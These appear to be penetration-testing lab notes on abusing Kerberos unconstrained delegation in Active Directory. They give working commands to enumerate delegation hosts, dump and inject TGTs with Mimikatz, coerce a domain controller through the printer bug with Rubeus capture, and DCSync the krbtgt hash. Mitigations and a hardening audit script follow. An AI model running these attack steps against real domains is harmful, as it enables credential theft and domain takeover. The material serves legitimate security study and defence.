Unconstrained Delegation

General

  • When set on a computer (or service) account, every user who authenticates to that host with Kerberos hands it a copy of their TGT, which the host can then use to reach any service on the domain as that user

  • When enabled, the KDC includes a forwardable TGT for the user inside the service ticket it issues when the user requests access to a service on the unconstrained host

  • The server extracts the TGT from the service ticket and caches it in LSASS

  • The server can reuse the user's TGT to access other resources as that user, for as long as the TGT is valid

  • Privilege escalation: if a Domain Admin or other high-value target (HVT) authenticates to the host, their TGT can be extracted and replayed

  • Note: local admin access on the unconstrained host is needed to extract tickets from LSASS

Exploitation

# Get computers that have unconstrained delegation enabled
# Domain controllers always have the flag set, so the interesting results are the non-DC hosts
# Using PowerView
Get-NetComputer -Unconstrained

# Using AD Module
Get-ADComputer -Filter { TrustedForDelegation -eq $true }
Get-ADUser -Filter { TrustedForDelegation -eq $true }

# ldapdomaindump
ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10   
grep TRUSTED_FOR_DELEGATION domain_computers.grep

# CrackMapExec
crackmapexec ldap 10.10.10.10 -u username -p password --trusted-for-delegation
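The PowerView, AD module and CrackMapExec commands above all query the same thing: the TRUSTED_FOR_DELEGATION bit (0x80000) in userAccountControl. The following is an added example, not part of the original notes or any of the tools it lists, that performs the same enumeration with the .NET System.DirectoryServices classes built into Windows, so it works from a host where PowerView or RSAT cannot be dropped. It also flags which results are domain controllers (SERVER_TRUST_ACCOUNT, 0x2000), since those always carry the flag and are not the targets of interest. The function name and its SearchBase parameter are this example's own.

```powershell
# Added example: enumerate unconstrained delegation without PowerView or the AD module.
# Flag values are the documented userAccountControl bits.
$TRUSTED_FOR_DELEGATION = 0x80000   # "Trust this computer for delegation to any service"
$SERVER_TRUST_ACCOUNT   = 0x2000    # set on domain controller computer accounts

function Get-UnconstrainedDelegation {
    param(
        # Hypothetical parameter: DN to search; defaults to the current domain's naming context
        [string]$SearchBase = ([ADSI]'LDAP://RootDSE').defaultNamingContext
    )

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, so this matches
    # any computer or user object whose userAccountControl has the TRUSTED_FOR_DELEGATION bit set.
    $searcher.Filter = "(&(|(objectCategory=computer)(objectCategory=person))" +
                       "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION))"
    $searcher.PageSize = 500
    foreach ($p in 'sAMAccountName','dNSHostName','userAccountControl','servicePrincipalName') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }

    foreach ($r in $searcher.FindAll()) {
        # Copy the result attributes into a hashtable; attributes absent on the object
        # (e.g. dNSHostName on a user) simply come back as $null instead of throwing.
        $props = @{}
        foreach ($name in $r.Properties.PropertyNames) { $props[$name] = @($r.Properties[$name]) }
        $uac = [int]$props['useraccountcontrol'][0]

        [pscustomobject]@{
            Account = [string]$props['samaccountname'][0]
            Host    = [string]$props['dnshostname'][0]
            # DCs are expected to have unconstrained delegation; non-DC hits are the targets
            IsDC    = [bool]($uac -band $SERVER_TRUST_ACCOUNT)
            SPNs    = ($props['serviceprincipalname'] -join ', ')
        }
    }
}

# Usage: list only the non-DC hosts and accounts trusted for unconstrained delegation
Get-UnconstrainedDelegation | Where-Object { -not $_.IsDC } | Format-Table -AutoSize
```

Run it from any domain-joined host as an ordinary domain user; reading userAccountControl does not require any privilege. A user account in the output (rather than a computer) is worth a second look, because it means a service running under that account can harvest TGTs from any host it runs on.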

# Monitor DA logins on computer
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

# Check if we have local admin access on that machine using PowerView
Find-LocalAdminAccess -ComputerName dcorp-appsrv

# Get session on machine as local admin and check for tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets"'

# Export tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# Inject ticket into the current session (note the double colon)
Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'

Printer Bug

  • Instead of waiting for an HVT to log in, coerce one into authenticating to the machine with unconstrained delegation

  • The Print Spooler (MS-RPRN) RpcRemoteFindFirstPrinterChangeNotificationEx call makes the target domain controller's machine account (e.g. dcorp-dc$) authenticate to a host of our choosing; with Kerberos, that delivers the DC's TGT to the unconstrained server

  • Requires the Print Spooler service to be running on the target DC (it is enabled by default)

  • https://github.com/leechristensen/SpoolSample

# On the unconstrained server (dcorp-appsrv), from an elevated session, start capturing TGTs using Rubeus
# /nowrap prints the base64 ticket on one line; add /filteruser:dcorp-dc$ to show only the DC's machine account
.\Rubeus.exe monitor /interval:5 /nowrap

# Run MS-RPRN.exe: first argument is the target DC, second is the unconstrained server we control
.\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

# From https://github.com/leechristensen/SpoolSample
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-NAME
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with unconstrained delegation enabled that we control

# From https://github.com/dirkjanm/krbrelayx (run from Linux)
printerbug.py 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-NAME>

# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689
# Argument order is listener first, then target
python dementor.py -d domain -u username -p password <UNCONSTRAINED-SERVER-NAME> <VICTIM-DC-NAME>

# Copy the base64 encoded TGT of dcorp-dc$ from the Rubeus monitor output (remove any line breaks or
# extra spaces) and inject it into a session on the attacker machine; /ticket accepts either the base64 blob
# or a .kirbi file
.\Rubeus.exe ptt /ticket:<base64 blob or ticket.kirbi>

# The injected ticket belongs to the DC's machine account, which has replication rights, so DCSync works
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Mitigation

  • Limit DA/Admin logins to specific servers (tiered administration); never log privileged accounts into hosts trusted for delegation

  • Set "Account is sensitive and cannot be delegated" (NOT_DELEGATED) for privileged accounts, so the KDC will not issue a forwardable TGT for them

  • Add privileged accounts to the Protected Users group, which also blocks their delegation

  • Replace unconstrained delegation with constrained or resource-based constrained delegation wherever it is still in use

  • Disable the Print Spooler service on domain controllers to remove the printer bug coercion path
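The "cannot be delegated" mitigation only helps if it is actually applied to every account that matters, and nested group membership makes that easy to miss. The following is an added audit script, not from the original notes, that walks the members of the tier-0 groups recursively with the RSAT AD module, reports which ones are neither marked NOT_DELEGATED nor in Protected Users, and with -Fix sets the flag on them. The function name, the -Fix switch and the default group list are this example's own assumptions; adjust the list to the environment.

```powershell
# Added example: find privileged users whose TGTs can still be delegated, and optionally fix them.
# Requires the ActiveDirectory module (RSAT) and rights to read group membership (and to write
# userAccountControl on the affected accounts when -Fix is used).
function Test-PrivilegedDelegationHardening {
    param(
        # Assumed list of tier-0 groups; Enterprise Admins and Schema Admins only exist in the forest root
        [string[]]$Groups = @('Domain Admins', 'Enterprise Admins', 'Administrators',
                              'Schema Admins', 'Account Operators', 'Backup Operators'),
        # Hypothetical switch: set "Account is sensitive and cannot be delegated" on unprotected users
        [switch]$Fix
    )

    $seen = @{}
    foreach ($g in $Groups) {
        # -Recursive expands nested groups; only user objects are of interest here
        $members = Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue |
                   Where-Object { $_.objectClass -eq 'user' }

        foreach ($m in $members) {
            if ($seen.ContainsKey($m.distinguishedName)) { continue }   # report each user once
            $seen[$m.distinguishedName] = $true

            $u = Get-ADUser -Identity $m.distinguishedName -Properties AccountNotDelegated, MemberOf
            $inProtectedUsers = [bool]($u.MemberOf | Where-Object { $_ -like 'CN=Protected Users,*' })

            # Either control is sufficient: the KDC will not issue a forwardable TGT for a
            # NOT_DELEGATED account or for a member of Protected Users.
            $delegatable = -not ($u.AccountNotDelegated -or $inProtectedUsers)

            if ($delegatable -and $Fix) {
                Set-ADAccountControl -Identity $u -AccountNotDelegated $true
                $u.AccountNotDelegated = $true
                $delegatable = $false
            }

            [pscustomobject]@{
                Account             = $u.SamAccountName
                ViaGroup            = $g
                AccountNotDelegated = [bool]$u.AccountNotDelegated
                ProtectedUsers      = $inProtectedUsers
                Delegatable         = $delegatable
            }
        }
    }
}

# Usage: report first, then re-run with -Fix once the list has been reviewed
Test-PrivilegedDelegationHardening | Where-Object Delegatable | Format-Table -AutoSize
```

Review the report before running with -Fix: the flag is safe on interactive admin accounts, but setting it on a service account that legitimately relies on delegation will break that service, and Protected Users additionally disables NTLM and DES/RC4 for its members.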
